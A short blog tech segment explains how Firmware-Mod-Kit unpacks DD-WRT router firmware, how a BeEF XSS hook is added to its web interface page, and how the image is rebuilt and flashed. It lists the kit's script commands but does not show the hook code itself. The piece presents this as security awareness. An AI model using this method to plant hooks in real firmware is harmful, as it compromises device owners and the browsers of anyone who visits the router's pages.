Content

Creating Malicious Firmware with Firmware-Mod-Kit

Firmware-Mod-Kit to make Malicious Firmware

The intent of this tech segment is really to show how insecure devices are, and how we need to be cautious when rooting, modifying or updating firmware. Where it first starts is a tool create by Craig Heffner and Jeremy Collake ( download here ). It allows you to take firmware and strip it down to its root file system, Craig uses that and binwalk a lot in his blog for embedded device hacking devttys0 . The use of the collection of scripts is completely easy, however, it saves you tons and tons of time, doing any of it manually would take hours if not days. Lets dive right into it.
First, we need to extract the firmware we have. I am using a router that is running dd-wrt, so I figure that would be a good firmware to get and rip apart. First, we run the command ./extract-firmware.sh filename. This will decompress the firmware and put it nicely into a “fmk/” directory.

 
Next we extract the dd-wrt gui (web sites) by typing ./ddwrt-gui-extract.sh:



We then find our target page Info.htm, open it and add in our XSS beef hook:


We package it all up and with ./ddwrt-gui-rebuild & ./build-firmware. When its done, we flash our router with the new firmware. When we come back to the page… our browser is now hooked and expoited.

 

Paul Asadoorian

Paul Asadoorian is currently the Principal Security Evangelist for Eclypsium, focused on firmware and supply chain security awareness. Paul’s passion for firmware security extends back many years to the WRT54G hacking days and reverse engineering firmware on IoT devices for fun. Paul and his long-time podcast co-host Larry Pesce co-authored the book “WRTG54G Ultimate Hacking” in 2007, which fueled the firmware hacking fire even more. Paul has worked in technology and information security for over 20 years, holding various security and engineering roles in a lottery company, university, ISP, independent penetration tester, and security product companies such as Tenable. In 2005 Paul founded Security Weekly, a weekly podcast dedicated to hacking and information security. In 2020 Security Weekly was acquired by the Cyberrisk Alliance. Paul is still the host of one of the longest-running security podcasts, Paul’s Security Weekly, he enjoys coding in Python & telling everyone he uses Linux.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.